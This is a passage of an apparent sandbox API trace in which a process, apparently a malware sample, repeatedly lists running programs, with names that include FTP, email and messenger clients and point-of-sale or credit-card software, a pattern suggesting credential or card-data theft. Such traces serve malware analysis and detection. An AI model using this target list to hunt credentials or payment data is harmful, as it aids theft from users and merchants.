dwFlags=0x0, szExeFile="far.exe")) returned 1 [0215.601] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0215.659] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0215.661] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0215.662] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0215.664] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0215.666] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0215.670] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0215.672] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0215.674] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0215.675] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0215.677] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0215.679] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0215.681] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0215.683] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0215.687] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0215.689] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0215.691] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0215.692] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0215.694] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0215.695] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0215.697] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0215.707] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0215.709] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0215.711] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0215.712] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0215.717] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0215.718] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0215.720] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0215.721] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0215.723] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0215.724] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0215.726] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0215.727] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0215.729] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0215.733] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0215.734] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0215.736] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0215.737] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0215.738] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0215.740] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0215.741] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0215.743] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.744] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.800] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.803] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0215.806] CloseHandle (hObject=0x1018) returned 1 [0215.806] Sleep (dwMilliseconds=0x64) [0215.970] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0215.985] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.987] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.989] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.990] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.992] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.994] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.999] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.001] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.003] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.005] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.006] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.008] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.074] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.077] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.079] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.081] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.083] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.086] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.088] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.093] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0216.095] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0216.097] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.101] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0216.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0216.108] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0216.110] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0216.111] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.113] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0216.115] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.117] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.119] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.138] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0216.140] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0216.142] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0216.144] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0216.145] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0216.147] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 